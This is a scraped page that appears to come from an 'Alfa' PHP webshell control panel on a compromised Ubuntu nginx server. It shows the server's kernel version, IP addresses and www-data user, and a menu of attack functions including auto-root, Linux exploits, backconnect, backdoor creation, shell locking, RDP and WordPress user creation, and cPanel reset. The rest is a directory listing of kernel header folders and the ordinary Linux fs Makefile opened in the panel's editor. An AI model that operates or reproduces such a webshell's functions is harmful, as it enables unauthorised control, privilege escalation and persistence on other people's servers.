Linux ubuntu 6.8.0-90-generic #91-Ubuntu SMP PREEMPT_DYNAMIC Tue Nov 18 14:14:30 UTC 2025 x86_64
nginx/1.24.0
: 67.217.245.49 | : 216.73.216.153
Cant Read [ /etc/named.conf ]
8.3.6
www-data
Bypass.pw
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
Backdoor Scanner
Backdoor Create
Alfa Webshell
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
src /
linux-headers-6.8.0-90 /
fs /
[ HOME SHELL ]
Name
Size
Permission
Action
9p
[ DIR ]
drwxr-xr-x
adfs
[ DIR ]
drwxr-xr-x
affs
[ DIR ]
drwxr-xr-x
afs
[ DIR ]
drwxr-xr-x
autofs
[ DIR ]
drwxr-xr-x
bcachefs
[ DIR ]
drwxr-xr-x
befs
[ DIR ]
drwxr-xr-x
bfs
[ DIR ]
drwxr-xr-x
btrfs
[ DIR ]
drwxr-xr-x
cachefiles
[ DIR ]
drwxr-xr-x
ceph
[ DIR ]
drwxr-xr-x
coda
[ DIR ]
drwxr-xr-x
configfs
[ DIR ]
drwxr-xr-x
cramfs
[ DIR ]
drwxr-xr-x
crypto
[ DIR ]
drwxr-xr-x
debugfs
[ DIR ]
drwxr-xr-x
devpts
[ DIR ]
drwxr-xr-x
dlm
[ DIR ]
drwxr-xr-x
ecryptfs
[ DIR ]
drwxr-xr-x
efivarfs
[ DIR ]
drwxr-xr-x
efs
[ DIR ]
drwxr-xr-x
erofs
[ DIR ]
drwxr-xr-x
exfat
[ DIR ]
drwxr-xr-x
exportfs
[ DIR ]
drwxr-xr-x
ext2
[ DIR ]
drwxr-xr-x
ext4
[ DIR ]
drwxr-xr-x
f2fs
[ DIR ]
drwxr-xr-x
fat
[ DIR ]
drwxr-xr-x
freevxfs
[ DIR ]
drwxr-xr-x
fuse
[ DIR ]
drwxr-xr-x
gfs2
[ DIR ]
drwxr-xr-x
hfs
[ DIR ]
drwxr-xr-x
hfsplus
[ DIR ]
drwxr-xr-x
hostfs
[ DIR ]
drwxr-xr-x
hpfs
[ DIR ]
drwxr-xr-x
hugetlbfs
[ DIR ]
drwxr-xr-x
iomap
[ DIR ]
drwxr-xr-x
isofs
[ DIR ]
drwxr-xr-x
jbd2
[ DIR ]
drwxr-xr-x
jffs2
[ DIR ]
drwxr-xr-x
jfs
[ DIR ]
drwxr-xr-x
kernfs
[ DIR ]
drwxr-xr-x
lockd
[ DIR ]
drwxr-xr-x
minix
[ DIR ]
drwxr-xr-x
netfs
[ DIR ]
drwxr-xr-x
nfs
[ DIR ]
drwxr-xr-x
nfs_common
[ DIR ]
drwxr-xr-x
nfsd
[ DIR ]
drwxr-xr-x
nilfs2
[ DIR ]
drwxr-xr-x
nls
[ DIR ]
drwxr-xr-x
notify
[ DIR ]
drwxr-xr-x
ntfs
[ DIR ]
drwxr-xr-x
ntfs3
[ DIR ]
drwxr-xr-x
ocfs2
[ DIR ]
drwxr-xr-x
omfs
[ DIR ]
drwxr-xr-x
openpromfs
[ DIR ]
drwxr-xr-x
orangefs
[ DIR ]
drwxr-xr-x
overlayfs
[ DIR ]
drwxr-xr-x
proc
[ DIR ]
drwxr-xr-x
pstore
[ DIR ]
drwxr-xr-x
qnx4
[ DIR ]
drwxr-xr-x
qnx6
[ DIR ]
drwxr-xr-x
quota
[ DIR ]
drwxr-xr-x
ramfs
[ DIR ]
drwxr-xr-x
reiserfs
[ DIR ]
drwxr-xr-x
romfs
[ DIR ]
drwxr-xr-x
smb
[ DIR ]
drwxr-xr-x
squashfs
[ DIR ]
drwxr-xr-x
sysfs
[ DIR ]
drwxr-xr-x
sysv
[ DIR ]
drwxr-xr-x
tracefs
[ DIR ]
drwxr-xr-x
ubifs
[ DIR ]
drwxr-xr-x
udf
[ DIR ]
drwxr-xr-x
ufs
[ DIR ]
drwxr-xr-x
unicode
[ DIR ]
drwxr-xr-x
vboxsf
[ DIR ]
drwxr-xr-x
verity
[ DIR ]
drwxr-xr-x
xfs
[ DIR ]
drwxr-xr-x
zonefs
[ DIR ]
drwxr-xr-x
Kconfig
10.16
KB
-rw-r--r--
Kconfig.binfmt
6.22
KB
-rw-r--r--
Makefile
4.39
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Makefile
# SPDX-License-Identifier: GPL-2.0 # # Makefile for the Linux filesystems. # # 14 Sep 2000, Christoph Hellwig <hch@infradead.org> # Rewritten to use lists instead of if-statements. # obj-y := open.o read_write.o file_table.o super.o \ char_dev.o stat.o exec.o pipe.o namei.o fcntl.o \ ioctl.o readdir.o select.o dcache.o inode.o \ attr.o bad_inode.o file.o filesystems.o namespace.o \ seq_file.o xattr.o libfs.o fs-writeback.o \ pnode.o splice.o sync.o utimes.o d_path.o \ stack.o fs_struct.o statfs.o fs_pin.o nsfs.o \ fs_types.o fs_context.o fs_parser.o fsopen.o init.o \ kernel_read_file.o mnt_idmapping.o remap_range.o obj-$(CONFIG_BUFFER_HEAD) += buffer.o mpage.o obj-$(CONFIG_PROC_FS) += proc_namespace.o obj-$(CONFIG_LEGACY_DIRECT_IO) += direct-io.o obj-y += notify/ obj-$(CONFIG_EPOLL) += eventpoll.o obj-y += anon_inodes.o obj-$(CONFIG_SIGNALFD) += signalfd.o obj-$(CONFIG_TIMERFD) += timerfd.o obj-$(CONFIG_EVENTFD) += eventfd.o obj-$(CONFIG_USERFAULTFD) += userfaultfd.o obj-$(CONFIG_AIO) += aio.o obj-$(CONFIG_FS_DAX) += dax.o obj-$(CONFIG_FS_ENCRYPTION) += crypto/ obj-$(CONFIG_FS_VERITY) += verity/ obj-$(CONFIG_FILE_LOCKING) += locks.o obj-$(CONFIG_BINFMT_MISC) += binfmt_misc.o obj-$(CONFIG_BINFMT_SCRIPT) += binfmt_script.o obj-$(CONFIG_BINFMT_ELF) += binfmt_elf.o obj-$(CONFIG_COMPAT_BINFMT_ELF) += compat_binfmt_elf.o obj-$(CONFIG_BINFMT_ELF_FDPIC) += binfmt_elf_fdpic.o obj-$(CONFIG_BINFMT_FLAT) += binfmt_flat.o obj-$(CONFIG_FS_STACK) += backing-file.o obj-$(CONFIG_FS_MBCACHE) += mbcache.o obj-$(CONFIG_FS_POSIX_ACL) += posix_acl.o obj-$(CONFIG_NFS_COMMON) += nfs_common/ obj-$(CONFIG_COREDUMP) += coredump.o obj-$(CONFIG_SYSCTL) += drop_caches.o sysctls.o obj-$(CONFIG_FHANDLE) += fhandle.o obj-y += iomap/ obj-y += quota/ obj-$(CONFIG_PROC_FS) += proc/ obj-$(CONFIG_KERNFS) += kernfs/ obj-$(CONFIG_SYSFS) += sysfs/ obj-$(CONFIG_CONFIGFS_FS) += configfs/ obj-y += devpts/ obj-$(CONFIG_DLM) += dlm/ # Do not add any filesystems before this line obj-$(CONFIG_NETFS_SUPPORT) += netfs/ obj-$(CONFIG_REISERFS_FS) += reiserfs/ obj-$(CONFIG_EXT4_FS) += ext4/ # We place ext4 before ext2 so that clean ext3 root fs's do NOT mount using the # ext2 driver, which doesn't know about journalling! Explicitly request ext2 # by giving the rootfstype= parameter. obj-$(CONFIG_EXT2_FS) += ext2/ obj-$(CONFIG_JBD2) += jbd2/ obj-$(CONFIG_CRAMFS) += cramfs/ obj-$(CONFIG_SQUASHFS) += squashfs/ obj-y += ramfs/ obj-$(CONFIG_HUGETLBFS) += hugetlbfs/ obj-$(CONFIG_CODA_FS) += coda/ obj-$(CONFIG_MINIX_FS) += minix/ obj-$(CONFIG_FAT_FS) += fat/ obj-$(CONFIG_EXFAT_FS) += exfat/ obj-$(CONFIG_BFS_FS) += bfs/ obj-$(CONFIG_ISO9660_FS) += isofs/ obj-$(CONFIG_HFSPLUS_FS) += hfsplus/ # Before hfs to find wrapped HFS+ obj-$(CONFIG_HFS_FS) += hfs/ obj-$(CONFIG_ECRYPT_FS) += ecryptfs/ obj-$(CONFIG_VXFS_FS) += freevxfs/ obj-$(CONFIG_NFS_FS) += nfs/ obj-$(CONFIG_EXPORTFS) += exportfs/ obj-$(CONFIG_NFSD) += nfsd/ obj-$(CONFIG_LOCKD) += lockd/ obj-$(CONFIG_NLS) += nls/ obj-y += unicode/ obj-$(CONFIG_SYSV_FS) += sysv/ obj-$(CONFIG_SMBFS) += smb/ obj-$(CONFIG_HPFS_FS) += hpfs/ obj-$(CONFIG_NTFS_FS) += ntfs/ obj-$(CONFIG_NTFS3_FS) += ntfs3/ obj-$(CONFIG_UFS_FS) += ufs/ obj-$(CONFIG_EFS_FS) += efs/ obj-$(CONFIG_JFFS2_FS) += jffs2/ obj-$(CONFIG_UBIFS_FS) += ubifs/ obj-$(CONFIG_AFFS_FS) += affs/ obj-$(CONFIG_ROMFS_FS) += romfs/ obj-$(CONFIG_QNX4FS_FS) += qnx4/ obj-$(CONFIG_QNX6FS_FS) += qnx6/ obj-$(CONFIG_AUTOFS_FS) += autofs/ obj-$(CONFIG_ADFS_FS) += adfs/ obj-$(CONFIG_FUSE_FS) += fuse/ obj-$(CONFIG_OVERLAY_FS) += overlayfs/ obj-$(CONFIG_ORANGEFS_FS) += orangefs/ obj-$(CONFIG_UDF_FS) += udf/ obj-$(CONFIG_SUN_OPENPROMFS) += openpromfs/ obj-$(CONFIG_OMFS_FS) += omfs/ obj-$(CONFIG_JFS_FS) += jfs/ obj-$(CONFIG_XFS_FS) += xfs/ obj-$(CONFIG_9P_FS) += 9p/ obj-$(CONFIG_AFS_FS) += afs/ obj-$(CONFIG_NILFS2_FS) += nilfs2/ obj-$(CONFIG_BEFS_FS) += befs/ obj-y += hostfs/ obj-$(CONFIG_CACHEFILES) += cachefiles/ obj-$(CONFIG_DEBUG_FS) += debugfs/ obj-$(CONFIG_TRACING) += tracefs/ obj-$(CONFIG_OCFS2_FS) += ocfs2/ obj-$(CONFIG_BTRFS_FS) += btrfs/ obj-$(CONFIG_GFS2_FS) += gfs2/ obj-$(CONFIG_F2FS_FS) += f2fs/ obj-$(CONFIG_BCACHEFS_FS) += bcachefs/ obj-$(CONFIG_CEPH_FS) += ceph/ obj-$(CONFIG_PSTORE) += pstore/ obj-$(CONFIG_EFIVAR_FS) += efivarfs/ obj-$(CONFIG_EROFS_FS) += erofs/ obj-$(CONFIG_VBOXSF_FS) += vboxsf/ obj-$(CONFIG_ZONEFS_FS) += zonefs/
Close